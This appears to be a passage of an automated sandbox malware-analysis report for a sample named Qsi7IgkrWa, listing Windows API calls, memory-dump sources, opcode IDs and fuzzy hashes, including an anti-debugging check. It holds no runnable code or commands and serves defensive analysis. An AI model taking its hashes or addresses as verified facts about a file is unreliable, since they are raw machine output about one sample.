                                        • Instruction Fuzzy Hash: B2310375D052199BDB20DFA4D989BDCBBF8EF08704F1041EEE40DAB250EB759A848F45
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,00BCE5E8,0000001C,00BCE7DD,00000000,?,?,?,?,?,?,?,00BCE5E8,00000004,00C11CEC,00BCE86D), ref: 00BCE6B4
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BCE5E8,00000004,00C11CEC,00BCE86D), ref: 00BCE6CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: f03bfb7d44d3a0422344d569d4b83c25e8e549fbe2a113d8bb0b77772fc4b9f5
                                        • Instruction ID: 1be43748c4461c8027262d7ccb3ec324a3b97e8197ee2d55a64994c2d999bb4b
                                        • Opcode Fuzzy Hash: f03bfb7d44d3a0422344d569d4b83c25e8e549fbe2a113d8bb0b77772fc4b9f5
                                        • Instruction Fuzzy Hash: 4901F732600109ABDB14DE29DC49FED7BEAEFC4324F0CC169ED69DB150DA38ED058680
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BD8FB5
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BD8FBF
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BD8FCC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 0fe7076c7964c6516b871448b7df57bfd42989bfa3e48121f84553749a1af80b
                                        • Instruction ID: c8159c562519c235279d06b31ab120c9c26d7784bf29579fa9010200710922f7
                                        • Opcode Fuzzy Hash: 0fe7076c7964c6516b871448b7df57bfd42989bfa3e48121f84553749a1af80b
                                        • Instruction Fuzzy Hash: C231C275901229ABCB21DF64DC89B9DBBF8EF08310F5041EAE41CA7250EB749F858F45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction ID: 0f0753119b3dda4e13db51087fdc2c4d9c1ebc76bbe77122a48953ffb88a4b00
                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction Fuzzy Hash: E7022C71E002199BDF14CFA9D8806ADF7F1EF48314F2582AAD959E7380E731AE41CB90
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BCAF35
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BEE72C,?,?), ref: 00BCAF84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 3c9ff727ec0caf5be2e98983beb46c718621fdb8c8cad10d2444b16feb91755b
                                        • Instruction ID: 737b4c0316187be075f56991b7049f5adbed835fe88197082c508702d948c0bb
                                        • Opcode Fuzzy Hash: 3c9ff727ec0caf5be2e98983beb46c718621fdb8c8cad10d2444b16feb91755b
                                        • Instruction Fuzzy Hash: 1001717A200348AAD7209F64DC45F9B77FCEF09710F00406AFA15EB190D7709955CBA5
                                        APIs
                                        • GetLastError.KERNEL32(00BB6DDF,00000000,00000400), ref: 00BB6C74
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BB6C95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 5c0ef0ceb291f62a5127d5bbdb2a5f25ed3278965fecf70ff5429ea1679925c5
                                        • Instruction ID: 30f516f8ea3c43e849216aecbbd56b31d44e3f641657ef4b17e040bfe450a6de
                                        • Opcode Fuzzy Hash: 5c0ef0ceb291f62a5127d5bbdb2a5f25ed3278965fecf70ff5429ea1679925c5
                                        • Instruction Fuzzy Hash: 09D09E31244300BBEA110A614D4AF6A6BD9FB45B51F14C4547655DA0E1CAB49914EA15
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BE19EF,?,?,00000008,?,?,00BE168F,00000000), ref: 00BE1C21
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: bb49c5551d4438a2c3ab87c221f4cf40e6786fd7770e7eed4c8c50a5426d2115
                                        • Instruction ID: 60177481251c19fb4c13d4ffdea452d80af8a54ae9f96fddf088695c98df5560
                                        • Opcode Fuzzy Hash: bb49c5551d4438a2c3ab87c221f4cf40e6786fd7770e7eed4c8c50a5426d2115
                                        • Instruction Fuzzy Hash: 99B13B316106499FD715CF2DC48AB657BE0FF45364F358A98E8AACF2A1C335E991CB40
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BCF66A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 5916beddeb6dbe455aff7ec669de859ab0a2257afb2f22d07d1be002594e0f94
                                        • Instruction ID: 2a90676cefbfb77a38d7d4b39e1fac7c2af934e2e1cc0256345e37b0afd1df8c
                                        • Opcode Fuzzy Hash: 5916beddeb6dbe455aff7ec669de859ab0a2257afb2f22d07d1be002594e0f94
                                        • Instruction Fuzzy Hash: 9F515CB190061ACFEB29CF94E985BAEBBF5FB48315F2485AAD815EB250D374DD00CB50
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00BBB16B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 5b5fcf982821a1790f1ceeeb35d6c0445c5c8af16652a8b9e1926718bde88356
                                        • Instruction ID: aef510c76c0e3fd1c3e06f60a69293ecd6054c2eefd17bcaea75bee1c89eb973
                                        • Opcode Fuzzy Hash: 5b5fcf982821a1790f1ceeeb35d6c0445c5c8af16652a8b9e1926718bde88356
                                        • Instruction Fuzzy Hash: 82F01DB4D00248CFDB18CB2CEC92AE573F1EB48715F104A95D51593391CBB0AA80CF60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 0a333d25ddb33ee5a5dbd674558896e778d8911d5d044dc93a86d498d9c8b69b
                                        • Instruction ID: 5f6d6a4f5d1d401db04b1f2d6f02a7553cdad198e3c1f8bef7814a6202462b66
                                        • Opcode Fuzzy Hash: 0a333d25ddb33ee5a5dbd674558896e778d8911d5d044dc93a86d498d9c8b69b
                                        • Instruction Fuzzy Hash: 10C14672A183818FC354CF29D88065AFBE1BFC8708F19892DE998D7311D734E949CB96
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00BCF3A5), ref: 00BCF9DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 99d70cbdd92dfdfada1b1d264222d9e487bf77887dfc4d292366c10ef3d2c709
                                        • Instruction ID: d109dca762dc3073ac50de877aedb6a4c2f9bccfc2e31e3adb90b4d84f64f81f
                                        • Opcode Fuzzy Hash: 99d70cbdd92dfdfada1b1d264222d9e487bf77887dfc4d292366c10ef3d2c709
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 1cfeb67c18eda610dc6aceb6a7c371dc8e0d8571f32d928a0c6fbf2855554a69
                                        • Instruction ID: 7434386492e8ae3a2f30cc72003eb4bdbe6cf37a31416b9c26813e5778721a07
                                        • Opcode Fuzzy Hash: 1cfeb67c18eda610dc6aceb6a7c371dc8e0d8571f32d928a0c6fbf2855554a69
                                        • Instruction Fuzzy Hash: 8DA011302022008B8300CF30AE8C38C3AE8AA02A80308802AA008CA0A0EA2080A0AA02
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                        • Instruction ID: ccf8e595b9cb5b274505d3900a4fd009f408463153f4fa231477fccec23fe7a5
                                        • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                        • Instruction Fuzzy Hash: A86294716047859FCB25CF28C490FB9BBE1AF95304F1889AED8EA8B346D734E945CB11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                        • Instruction ID: 6591c3dacb31d2fab444eb7a73a1a1de32a3235adccafc61957f4f4be9357fe6
                                        • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                        • Instruction Fuzzy Hash: 3A62D9716483858FCB15CF28C890AB9BBE1FF99304F1885ADE9968B346DB30E945CF15
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                        • Instruction ID: 84f9b625377e6b0df595915dae2050486c60bfb30bbd894d76c3bcde0d06c794
                                        • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                        • Instruction Fuzzy Hash: 41524872A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53c6094958c7e6aba1a89ec93d65640fb541e0a31e93920c3f7947c95216168c
                                        • Instruction ID: 305524d80b8793d3b386a0ba5d969a276222797dc2d094eca15a008f9afda381
                                        • Opcode Fuzzy Hash: 53c6094958c7e6aba1a89ec93d65640fb541e0a31e93920c3f7947c95216168c
                                        • Instruction Fuzzy Hash: 1A12DFB06587068FC718CF28C8D0BB9B7E1FB94304F14896EE996C7780EB34A995CB45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449c43748033aa952cca11344854b57e9d5856edf2418d68dc521bb33eff89b7
                                        • Instruction ID: a9f0390db90833dd883c9f30cc6f10dc181dda591f19b888f909991e0bd3289a
                                        • Opcode Fuzzy Hash: 449c43748033aa952cca11344854b57e9d5856edf2418d68dc521bb33eff89b7
                                        • Instruction Fuzzy Hash: 20F19A716083018FD719CF28C484ABABFE1EFCA314F645AAEF4D697251D7B0E9458B42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
